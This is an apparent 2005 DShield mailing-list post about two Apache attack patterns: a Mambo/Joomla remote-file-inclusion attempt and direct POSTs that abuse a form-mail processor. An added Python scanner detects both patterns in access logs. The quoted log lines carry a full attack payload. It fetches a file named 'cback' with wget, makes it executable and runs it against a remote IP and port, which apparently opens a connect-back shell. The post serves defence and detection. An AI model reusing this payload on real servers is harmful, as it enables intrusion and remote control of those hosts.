[Dshield] A Couple of New Apache Hack Patterns

David Cary Hart DShield at TQMcube.com
Wed Dec 14 15:24:01 GMT 2005


. . . new for me anyway.

1. index2.php | index.php

/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;.cback%20217.160.242.90%208080;echo%20YYY;echo|HTTP/1.1" 302 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

or:

/cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo| HTTP/1.1" 301 562 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"


2. POST directly to the form mail php processing page. In other words,
something like contact.php is passed to, and processed by
ContactProc.php. The would-be spammer-hacker-miscreant is trying to
forward mail by eliminating the form entry page.

The strategy I am using these days is to SWATCH the patterns -> rewrite
rule to hacker.php -> firewall rule. The purpose of the interim
hacker.php is to provide information just in case of a false positive.
Hacker.php then writes a unique line to access_log which swatch
recognizes to trigger the firewall rule.

-- 
Our DNSRBL - 
           Eliminate Spam: http://www.TQMcube.com/spam_trap.php
          Multi-RBL Check: http://www.TQMcube.com/rblcheck.php
            Zombie Graphs: http://www.TQMcube.com/zombies.php
              GeoGraphics: http://www.TQMcube.com/origins.php
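
As an added illustration of the two patterns described in the post (not the author's swatch or hacker.php code), the following Python scanner classifies Apache combined-format access_log lines the same way the post's swatch rules would: a `mosConfig_absolute_path` parameter carrying a remote URL, and a POST sent straight to the form-processing page without arriving from the form page. The log lines, IP addresses and the `/contact.php` -> `/ContactProc.php` page names are constructed for the example.

```python
import re
from typing import Optional

# Constructed sample access_log lines (RFC 5737 documentation addresses, not real hosts).
SAMPLE_LOG = """\
192.0.2.10 - - [14/Dec/2005:10:01:02 +0000] "GET /index2.php?_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path=http://203.0.113.5/cmd.gif?&cmd=id HTTP/1.1" 302 290 "-" "Mozilla/4.0"
192.0.2.11 - - [14/Dec/2005:10:02:15 +0000] "POST /ContactProc.php HTTP/1.1" 200 512 "-" "Mozilla/4.0"
192.0.2.12 - - [14/Dec/2005:10:03:40 +0000] "POST /ContactProc.php HTTP/1.1" 200 512 "http://www.example.com/contact.php" "Mozilla/4.0"
192.0.2.13 - - [14/Dec/2005:10:04:01 +0000] "GET /index.php?option=com_content&id=1 HTTP/1.1" 200 8123 "-" "Mozilla/4.0"
"""

# Apache "combined" log format: client, ident, user, [timestamp], "request", status, bytes, "referer", "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Pattern 1: Mambo/Joomla mosConfig_absolute_path pointed at a remote URL (remote file inclusion attempt).
RFI_RE = re.compile(r'mosConfig_absolute_path=(?:https?|ftp)://', re.IGNORECASE)

# Pattern 2: POST delivered straight to the form processor, bypassing the form entry page.
FORM_PROCESSOR = "/ContactProc.php"   # hypothetical page names, as in the post
FORM_PAGE = "/contact.php"


def classify(line: str) -> Optional[str]:
    """Return 'rfi', 'direct-post', or None for a single access_log line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    if RFI_RE.search(m["path"]):
        return "rfi"
    if (m["method"] == "POST" and m["path"] == FORM_PROCESSOR
            and not m["referer"].endswith(FORM_PAGE)):
        return "direct-post"
    return None


def scan(log_text: str) -> list[tuple[str, str]]:
    """Return (client_ip, pattern) for every line that matches one of the patterns."""
    hits = []
    for line in log_text.splitlines():
        kind = classify(line)
        if kind:
            hits.append((LOG_RE.match(line)["ip"], kind))
    return hits


def marker_line(ip: str, kind: str) -> str:
    """The kind of unique line the interim trap page would write for swatch to act on."""
    return f"HACKER-TRAP client={ip} pattern={kind}"
```

The Referer check is the weak link: some legitimate clients send none, which is exactly why the post keeps the interim hacker.php step for false-positive review before the firewall rule fires.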
